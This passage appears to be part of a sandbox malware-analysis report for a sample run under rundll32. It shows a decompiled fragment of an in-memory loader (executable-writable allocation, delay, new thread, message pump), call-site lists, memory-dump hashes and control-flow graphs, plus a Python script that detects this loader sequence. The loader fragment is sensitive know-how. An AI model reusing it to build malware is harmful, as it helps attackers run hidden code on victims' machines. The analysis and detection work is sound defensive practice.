				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed; starts a thread at _v8 with lpParameter = 1 (where _v8 is assigned lies outside this excerpt)
				_v56 = _t43; // thread handle saved; nothing in this excerpt waits on it
				SetTimer(0, 0, 0x2000, 0); // executed; thread-queue timer (no HWND, no callback): WM_TIMER every 0x2000 = 8192 ms
				while(1) { // message pump: keeps the host process responsive while the new thread runs
					_t45 = GetMessageW( &_v40, 0, 0, 0);
					if(_t45 == 0) { // 0 = WM_QUIT
						break;
					}
					_v40.message = _v40.message + 1;
					if(_v40.message == 0x114) { // decompiler rendering of "message == 0x113", i.e. WM_TIMER: return on the first timer tick (about 8 s later)
						return _t45;
					}
					DispatchMessageW( &_v40);
				}
				return _t45;
			}
Executed-address column for the function above (one address per decompiled line): 0x04063791 through 0x040638b1. The call sites themselves are listed under APIs below.

APIs
• SetTimer.USER32 ref: 04063791
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 040637A1
• DispatchMessageW.USER32 ref: 040637C3
• VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 0406381C (lpAddress = NULL, dwSize = 0x43000 = 268 KiB, flAllocationType = MEM_COMMIT, flProtect = PAGE_EXECUTE_READWRITE)
• Sleep.KERNEL32(000001F4), ref: 04063830 (0x1F4 = 500 ms)
• CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 04063860 (lpParameter = 1; the decompiled call passes _v8 as lpStartAddress, which the static argument list shows as 0)
• SetTimer.USER32 ref: 04063874
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04063884
• DispatchMessageW.USER32 ref: 040638A6
Read in call-site order, the second half of this function is the classic in-process loader sequence: commit an RWX region, wait half a second, start a thread, then sit in a SetTimer/GetMessageW/DispatchMessageW pump. A "?" argument is one the plugin could not resolve statically (here the MSG pointer &_v40). The static list carries no return values, so the page cannot show that the thread start address lies inside the RWX region; that check needs a dynamic trace.
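The sequence above is detectable from the call-site list alone. The script below is an added example for this report, not code from Joe Sandbox or from the sample: it parses the "• Api.MODULE(args), ref: addr" bullet format shown under APIs, ties together the RWX VirtualAlloc, the Sleep, the later CreateThread and the message pump that follows it, and reports a verdict. The first input is the call-site list from this page; the second, a benign message loop with a PAGE_READWRITE allocation, is constructed for contrast. The constants are the Win32 definitions.

```python
"""
Flag the RWX-allocate -> delay -> CreateThread -> message-pump sequence in a
Joe Sandbox style "APIs" call-site list.

Added example for this report, not Joe Sandbox or sample code. Assumes the
'• Api.MODULE(args), ref: addr' bullet format; constants are Win32 values.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

PAGE_EXECUTE_READWRITE = 0x40   # VirtualAlloc flProtect
MEM_COMMIT = 0x1000             # VirtualAlloc flAllocationType

# One call-site line: optional bullet, Api.MODULE, optional (args), ", ref: addr".
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None where the plugin printed '?' (unresolved)
    ref: int                    # call-site address


def parse_api_list(text: str) -> List[Call]:
    """Parse the bullet list; lines that are not call sites are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


@dataclass
class Verdict:
    rwx_alloc_size: Optional[int] = None   # dwSize of the committed RWX region
    sleep_ms: Optional[int] = None         # Sleep() between the alloc and the thread
    thread_after_alloc: bool = False       # CreateThread seen after the RWX alloc
    pump_after_thread: bool = False        # GetMessage + DispatchMessage after it

    @property
    def is_loader_pattern(self) -> bool:
        return (self.rwx_alloc_size is not None
                and self.thread_after_alloc
                and self.pump_after_thread)


def find_loader_sequence(calls: List[Call]) -> Verdict:
    """Walk the call sites in address order and tie the stages together.

    The static list has no return values, so the check is on ordering and on
    VirtualAlloc's flags; a dynamic trace would also let you assert that
    CreateThread's lpStartAddress falls inside the returned region.
    """
    v = Verdict()
    alloc_i: Optional[int] = None
    thread_i: Optional[int] = None
    for i, c in enumerate(calls):
        if c.api == "VirtualAlloc" and len(c.args) == 4:
            _, size, alloc_type, protect = c.args
            if (protect == PAGE_EXECUTE_READWRITE and alloc_type is not None
                    and alloc_type & MEM_COMMIT):
                alloc_i, v.rwx_alloc_size = i, size
        elif c.api == "Sleep" and alloc_i is not None and thread_i is None and c.args:
            v.sleep_ms = c.args[0]
        elif c.api == "CreateThread" and alloc_i is not None and thread_i is None:
            thread_i, v.thread_after_alloc = i, True
    if thread_i is not None:
        later = {c.api for c in calls[thread_i + 1:]}
        v.pump_after_thread = (bool(later & {"GetMessageW", "GetMessageA"})
                               and bool(later & {"DispatchMessageW", "DispatchMessageA"}))
    return v


# Call-site list copied from the "APIs" section of this report.
SAMPLE_API_LIST = """
• SetTimer.USER32 ref: 04063791
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 040637A1
• DispatchMessageW.USER32 ref: 040637C3
• VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 0406381C
• Sleep.KERNEL32(000001F4), ref: 04063830
• CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 04063860
• SetTimer.USER32 ref: 04063874
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04063884
• DispatchMessageW.USER32 ref: 040638A6
"""

# Constructed control case: an ordinary message loop with a PAGE_READWRITE (0x04) buffer.
BENIGN_API_LIST = """
• VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000004), ref: 00401010
• SetTimer.USER32 ref: 00401020
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401030
• DispatchMessageW.USER32 ref: 00401040
"""

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_API_LIST), ("benign", BENIGN_API_LIST)):
        print(name, find_loader_sequence(parse_api_list(text)))
```

The ordering rule is deliberately narrow: a GUI program allocates memory and pumps messages all day, so the verdict requires the executable-and-writable protection, a thread created after that allocation, and a pump that only begins once the thread exists. Treat the 500 ms Sleep as corroboration, not as a condition.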
Memory Dump Source
• Source File: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, Offset: 04030000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4030000_rundll32.jbxd
Similarity
• API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
• String ID: @
• API String ID: 368155642-2766056989
• Opcode ID: 496c8774a3f5ec037b8bf23d6e6358b4b63a0b619cce4954bb749a3fe6a8ba41
• Instruction ID: 47c340a93a5c949bd438ba6c48232facc218ea93e091315bcff16f59df542810
• Opcode Fuzzy Hash: 496c8774a3f5ec037b8bf23d6e6358b4b63a0b619cce4954bb749a3fe6a8ba41
• Instruction Fuzzy Hash: 2741C670A44218EFEB14CFA4DD49FDDBBB4FB48B05F104119EA077A280D779B9409B69
Uniqueness Score: -1.00%

Control-flow Graph (basic blocks and edges of the original rendering; its executed/not-executed colouring is not preserved in text)
Blocks (node: address range):
  22: 4072720-4072766
  23: 4072768-4072774
  24: 4072776-4072782
  25: 4072784-407278d
  26: 407278e-40727c8
  32: 40727cb-40727d4
  33: 40727da-4072808
  35: 4072817-407282d
  36: 407280a-4072813
Edges: 22->23, 23->23 (self-loop), 23->24, 24->25, 24->26, 25->26, 26->32, 32->33, 33->35, 33->36, 36->35
Memory Dump Source
• Source File: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, Offset: 04070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4070000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: acd603c988a59336cb80770da4cb7366b2a1490a3f044f33b06c58e03abc8b05
• Instruction ID: 8d7e1490ef5ea54b552c199911c267cd5fa8441b4287f94200aaef173d1bd168
• Opcode Fuzzy Hash: acd603c988a59336cb80770da4cb7366b2a1490a3f044f33b06c58e03abc8b05
• Instruction Fuzzy Hash: E7411AB5604205AFEB08CF18D949D6ABBEDFB48225B10855DF809CB341DA31ED41CBA5
Uniqueness Score: -1.00%

Control-flow Graph (basic blocks and edges of the original rendering; its executed/not-executed colouring is not preserved in text)
Blocks (node: address range):
  37: 40727cb-40727d4
  38: 40727da-4072808
  40: 4072817-407282d
  41: 407280a-4072813
Edges: 37->38, 38->40, 38->41, 41->40
These four blocks cover the same address ranges as nodes 32, 33, 35 and 36 of the preceding graph: the plugin has recorded 40727cb as a second function entry that shares the tail of the function above.
Memory Dump Source
• Source File: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, Offset: 04070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4070000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
• Instruction ID: fec8902ca0489efd360ec096d71ec415a4c027945833c47a1cecfe409a6af7fb
• Opcode Fuzzy Hash: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
• Instruction Fuzzy Hash: 6401E8B5A00209AFDB44DF18C84495ABBA9FF88314B15C999FC19CB301D731ED91CBA5
Uniqueness Score: -1.00%

Non-executed Functions